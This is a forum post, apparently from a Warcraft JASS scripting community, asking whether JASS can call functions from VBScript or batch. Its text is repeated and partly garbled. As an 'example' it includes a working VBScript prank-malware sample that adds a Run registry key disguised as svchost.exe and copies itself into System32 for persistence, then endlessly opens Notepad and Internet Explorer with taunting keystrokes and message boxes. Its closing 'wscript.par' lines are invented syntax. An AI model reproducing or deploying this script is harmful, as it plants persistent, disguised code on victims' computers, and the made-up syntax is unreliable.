Hey all, im new here,
but ive had a bit of experience with language scripts ( batch and visual basics ) and ive found it possable to incorporate batch into VB and visa versa
im wondering if that is possable with jass, to call a funtion used by another language?
I think this may be possable, due to very close similarities between jass and VB
Example: (please for the sake of humanity do NOT try this script code, i have used it as an example because it causes alot of things to happen that involve do and loop, and the same sort of funtions that happen in jass. note: if you are silly enough to ignore my plead, be warned i will NOT be held accountable for any damage it might and WILL do to you computer.)
See at the last line the "loop" funtion, and its above counterpart "do"
they have similar properties to the jass version, where i can add a simple line
and with batch i call do this to use such funtions:
and that there is a batch use other language paramiter.
Hope someone can answer my question
but ive had a bit of experience with language scripts ( batch and visual basics ) and ive found it possable to incorporate batch into VB and visa versa
im wondering if that is possable with jass, to call a funtion used by another language?
I think this may be possable, due to very close similarities between jass and VB
Example: (please for the sake of humanity do NOT try this script code, i have used it as an example because it causes alot of things to happen that involve do and loop, and the same sort of funtions that happen in jass. note: if you are silly enough to ignore my plead, be warned i will NOT be held accountable for any damage it might and WILL do to you computer.)
exitwhen <condition>
Set wshShell = wscript.CreateObject("WScript.Shell")
Wshshell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe","C:\Windows\System32\Tankgame.vbs"
Set wshshell = WScript.CreateObject("Scripting.FileSystemObject")
Wshshell.CopyFile WScript.ScriptFullName, "C:\Windows\system32\Tankgame.vbs"
Wshshell.run "Notepad"
wscript.sleep 100
Wshshell.sendkeys "YOU"
wscript.sleep 700
wshshell.sendkeys "ARE"
Wscript.sleep 700
wshshell.sendkeys "A NOOB!"
wscript.sleep 10000
MsgBox"An error has occured. It appears that you are a noob.", 16 + 4096, "NOOB Alert"
wscript.sleep 10000
wscript.sleep 2000
wshshell.run "iexplore"
Wscript.sleep 2000
wshshell.run "notepad"
wscript.sleep 100
wshshell.sendkeys "HE"
wscript.sleep 500
wshshell.sendkeys "LL"
wscript.sleep 500
wshshell.sendkeys "O!"
wscript.sleep 1000
MsgBox"Lets try again, shall we?", 16 + 4096, "@_@"
See at the last line the "loop" funtion, and its above counterpart "do"
they have similar properties to the jass version, where i can add a simple line
wscript.sleep 500
wscript.par if
wshshell.used num, 10
wscript.par then
wscript.par loop
and with batch i call do this to use such funtions:
wscript.sleep 500
and that there is a batch use other language paramiter.
Hope someone can answer my question